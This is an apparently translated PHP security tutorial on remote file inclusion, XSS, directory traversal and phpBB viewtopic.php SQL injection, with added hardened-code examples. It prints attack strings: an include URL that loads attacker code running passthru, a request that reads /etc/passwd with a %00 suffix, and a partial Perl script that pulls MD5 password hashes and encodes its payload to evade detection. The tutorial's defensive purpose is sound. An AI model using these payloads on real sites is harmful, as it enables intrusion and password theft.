PHP page Vulnerability analysis and related problem solving _php tutorial

Source: Internet
Author: User
Tags md5 hash
In today's network security scene, the web page vulnerabilities that get the most attention and that we meet most often are in ASP; small bamboo is the expert there, and I have nothing to add. PHP, however, also has serious security problems, yet there are few articles on the subject. Here I would like to discuss PHP page vulnerabilities with you a little.

I have summarised the PHP vulnerabilities that are common at the moment; broadly they fall into these kinds: include file vulnerabilities, script command execution vulnerabilities, file disclosure vulnerabilities, SQL injection vulnerabilities and a few others. Generic techniques such as cookie spoofing are not discussed here, since there is plenty about them online. So let's look at how these vulnerabilities are exploited.

First, the include file vulnerability. This one could be said to be unique to PHP. It comes from insufficient handling of externally supplied malicious data and can let a remote attacker execute arbitrary commands on the system with the privileges of the web process. Consider an example: suppose a.php contains this code:

The following is a reference fragment:

```php
<?php
// $include comes from outside the script and is used as-is to build the path
include($include . "/xxx.php");
?>
```

In this code $include is normally one of a set of paths, but we can construct a path of our own to carry out the attack. Say we submit a.php?include=http://web/b.php, where web is the host we use for the attack and b.php is the code we use to attack; in b.php we can write something like passthru("/bin/ls /etc"). In this way targeted attacks can be carried out. (Note: that web server must not itself execute the PHP code, otherwise it will not work. For more details see "How to attack common vulnerabilities in PHP programs".) Many applications have had this vulnerability, for example PayPal Store Front, HotNews, Mambo Open Source, phpDig, YaBB SE, phpBB, Invision Board, Solmetra SPAW Editor, Les Visiteurs, PhpGedView, X-Cart and a few others.
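The vulnerable include pattern from above beside a hardened form, as an added example that is not from the original article or from any of the products it lists. The module names in the allowlist and the modules/ directory are assumed for illustration; it targets current PHP rather than the PHP 4 of the article.

```php
<?php
// Vulnerable (the article's pattern): whatever the client sends becomes the
// include path. With allow_url_fopen/allow_url_include on, a value such as
// "http://web/b.php" is fetched from the remote host and executed.
function include_vulnerable(string $include): void
{
    include($include . "/xxx.php");
}

// Hardened: the request value is only ever a key into a fixed allowlist of
// local directories; no part of the path is built from user input.
function include_hardened(string $include): void
{
    $allowed = [                       // hypothetical module names
        'news'  => __DIR__ . '/modules/news',
        'forum' => __DIR__ . '/modules/forum',
    ];
    if (!isset($allowed[$include])) {
        http_response_code(400);
        exit('unknown module');
    }
    include $allowed[$include] . '/xxx.php';
}

// Defence in depth: confirm at runtime that remote includes are switched off
// (php.ini: allow_url_include = Off; ideally allow_url_fopen = Off as well).
function remote_include_disabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN) === false;
}

if (!remote_include_disabled()) {
    error_log('allow_url_include is enabled; remote file inclusion is possible');
}
include_hardened($_GET['include'] ?? '');
```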

Next, the script command execution vulnerability. This is caused by insufficient filtering of the URI parameters submitted by the user: submitting data that contains malicious HTML code triggers a cross-site scripting attack, which can be used to obtain sensitive information from the target user. An example: in PHP Transparent 4.3.1 and below, the index.php page does not adequately filter PHPSESSID, and a request such as http://web/index.php?PHPSESSID="> followed by a script can be used for the attack; in the script we can build functions that obtain sensitive information from the user. This vulnerability is comparatively rare; besides PHP Transparent it has appeared in PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board and others.
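The index.php case above, where a PHPSESSID taken from the URL is written back into the page, with two layers of defence: accept only a well-formed session id, and HTML-encode whatever is still echoed. This is an added example, not PHP Transparent's code, and it assumes the application uses 32-character hex (md5-style) session ids.

```php
<?php
// Layer 1: a session id is 32 hex characters in this application (assumption);
// anything else, such as the article's "> break-out, is rejected before it can
// reach the page at all.
function session_id_from_request(array $get): ?string
{
    $sid = $get['PHPSESSID'] ?? '';
    return preg_match('/^[0-9a-f]{32}$/', $sid) ? $sid : null;
}

// Layer 2: output encoding for any user-controlled text that must be echoed,
// e.g. into a hidden form field or a link. ENT_QUOTES also escapes the double
// quote the article's payload uses to break out of an attribute value.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$sid = session_id_from_request($_GET);
if ($sid === null) {
    session_start();                 // fall back to a server-generated id
    $sid = session_id();
}
echo '<input type="hidden" name="PHPSESSID" value="' . html_attr($sid) . '">';
```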

Then the file disclosure vulnerability, caused by insufficient filtering of user-submitted parameters, which a remote attacker can use to perform directory traversal and obtain sensitive information. Take the phpMyAdmin case we found recently: the export.php page does not adequately filter the 'what' parameter submitted by the user, and a remote attacker who submits data containing several '../' sequences can escape the web root and view any file on the system that the web permissions allow. For example, requesting export.php?what=../../../../../../etc/passwd%00 achieves the file leak. There are somewhat more of these; others include MyPHPNuke, McNews and so on.
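A containment check for a user-supplied file name such as the export.php 'what' parameter, covering both the '../' segments and the trailing %00 from the request above. This is an added example, not phpMyAdmin's code; the exports/ directory is assumed for illustration.

```php
<?php
function safe_export_path(string $baseDir, string $what): ?string
{
    // A NUL byte (%00 in the URL) would cut the name short in C-level file
    // calls; reject it outright rather than trying to strip it.
    if (strpos($what, "\0") !== false) {
        return null;
    }
    // Allow only a plain file name: no slashes, and not "." or "..".
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $what) || $what === '.' || $what === '..') {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $what);
    // realpath() resolves symlinks and "../"; the result must stay under $base
    // (the separator is included so that /srv/exports2 does not match /srv/exports).
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed inputs mirroring the article's request; the first two are rejected,
// the third is served only if the file really exists inside the export directory.
$exportDir = __DIR__ . '/exports';                                 // hypothetical
foreach (["../../../../../../etc/passwd\0", '../../../../../../etc/passwd', 'dump.sql'] as $what) {
    $path = safe_export_path($exportDir, $what);
    echo json_encode($what), ' => ', $path === null ? 'rejected' : $path, "\n";
}
```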

Finally, back to the most exciting part. Think how satisfying SQL injection was on ASP pages: at first injection was done by hand, until small bamboo wrote the "SQL Injection Secret Manual" (hehe) and then released NBSI, after which we of the NB Alliance really took off, and helped CSDN, the Tycoon Forum, China Channel and other large sites find vulnerabilities. (Enough chatter, that is a bit off topic...)

Back to the subject. SQL injection in PHP is roughly the same as in ASP; you only need to pay attention to a few functions. Change ASC to ASCII and LEN to LENGTH, and the other functions are basically the same. When we think of SQL injection in PHP, don't we all think of PHP-Nuke and phpBB? As the saying goes, a tall tree catches the wind: just as the best-known forum in the ASP community is the king of vulnerabilities, not because its security is so poor but because its fame is so loud, more people use it, more people study it, and so more vulnerabilities are found. phpBB is the same: a large share of the people who build forums in PHP choose phpBB. Its vulnerabilities keep appearing, from the first one found in phpbb.com's phpBB 1.4.0 to the recent groupcp.php in phpBB 2.0.6, plus the search.php, profile.php, viewtopic.php and others found earlier, probably a dozen or so in total. This has also meant that people studying PHP vulnerabilities take it as their test subject; practice makes perfect, and I believe phpBB will be better in future.

Let's try to analyse the cause of the vulnerability. Take the viewtopic.php page: when viewtopic.php is called, topic_id is taken directly from the GET request and passed into the SQL query without any filtering, so an attacker can submit a crafted SQL string to obtain the MD5 password hash, which can then be used for automatic login or brute forcing. (I don't think anyone would bother with brute forcing unless for a particularly important reason.) First the relevant source code:

The following is a reference fragment:

```php
if (isset($HTTP_GET_VARS[POST_TOPIC_URL]))
{
    $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if (isset($HTTP_GET_VARS['topic']))
{
    $topic_id = intval($HTTP_GET_VARS['topic']);
}
// Neither branch runs when the request carries a bare topic_id parameter, so
// the value that reaches the query below never passes through intval().
```

From the above we can see that if view=newest is submitted and sid is set, the query executed looks like this (if you have not read the phpBB source, it is recommended that you take a look; the affected systems are phpBB 2.0.5 and phpBB 2.0.4).

The following is a reference fragment:

```php
$sql = "SELECT p.post_id
    FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
    WHERE s.session_id = '$session_id'
        AND u.user_id = s.session_user_id
        AND p.topic_id = $topic_id
        AND p.post_time >= u.user_lastvisit
    ORDER BY p.post_time ASC
    LIMIT 1";
```

Rick provides the following test code:

```perl
use IO::Socket;

$remote     = shift || 'localhost';
$view_topic = shift || '/phpbb2/viewtopic.php';
$uid        = shift || 2;
$port       = 80;
$dbtype     = 'mysql4';    # mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

# one request per character of the 32-character MD5 hash
for ($index = 1; $index <= 32; $index++)
{
    $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                    PeerPort => $port,
                                    Proto    => "tcp",
                                    Type     => SOCK_STREAM)
        or die "couldnt connect to $remote:$port: $@";

    $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\n";
    print $socket $str;
    print $socket "Cookie: phpbb2mysql_sid=1\n";    # Replace this for pgsql or remove it
    print $socket "Host: $remote\n\n";

    while ($answer = <$socket>)
    {
        if ($answer =~ /Location:.*\x23(\d+)/)    # Matches the Location: viewtopic.php?p=#
        {
            $p .= chr($1);
        }
    }
    close($socket);
}

print "MD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
    $str = shift;
    $ret = "";
    for ($i = 0; $i < length($str); $i++)
    {
        $c = substr($str, $i, 1);
        $j = rand length($str) * 1000;

        if (int($j) % 2 || $c eq " ")
        {
            $ret .= "%" . sprintf("%x", ord($c));
        }
# The listing ends here on the page; the remainder of random_encode and the
# make_dbsql subroutine are not shown.
```
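Because the script above hides its payload behind a random mix of %xx escapes ("helps avoid detection"), any log check has to decode before matching rather than grep for literal keywords. This added example, not part of the article or of Rick's script, runs that check over constructed Apache-style access log lines: the topic parameters of viewtopic.php must be purely numeric, whatever the encoding.

```php
<?php
// Constructed sample log lines (combined format, abbreviated). The second and
// third carry the same non-numeric topic_id in two different encodings.
$lines = [
    '10.0.0.5 - - [01/Jan/2004:10:00:00 +0000] "GET /phpbb2/viewtopic.php?t=12&view=newest HTTP/1.0" 302 0',
    '10.0.0.9 - - [01/Jan/2004:10:00:01 +0000] "GET /phpbb2/viewtopic.php?sid=1&topic_id=-1%20%4fR%201%3D1&view=newest HTTP/1.0" 302 0',
    '10.0.0.9 - - [01/Jan/2004:10:00:02 +0000] "GET /phpbb2/viewtopic.php?sid=1&topic_id=-1+or+1%3d1&view=newest HTTP/1.0" 302 0',
];

function suspicious_topic_requests(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        if (!preg_match('/"GET\s+(\S*viewtopic\.php\S*)\s+HTTP/', $line, $m)) {
            continue;                       // not a viewtopic.php request
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        // parse_str() applies %xx and '+' decoding, so %4fR and +or+ both
        // collapse to plain text before the value is inspected.
        parse_str($query, $params);
        foreach (['topic_id', 't', 'topic'] as $key) {
            if (isset($params[$key]) && !ctype_digit((string) $params[$key])) {
                $hits[] = ['line' => $n + 1, 'param' => $key, 'value' => $params[$key]];
            }
        }
    }
    return $hits;
}

foreach (suspicious_topic_requests($lines) as $hit) {
    printf("line %d: non-numeric %s=%s\n", $hit['line'], $hit['param'], $hit['value']);
}
```

Only the second and third lines are reported; the first, with t=12, passes.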

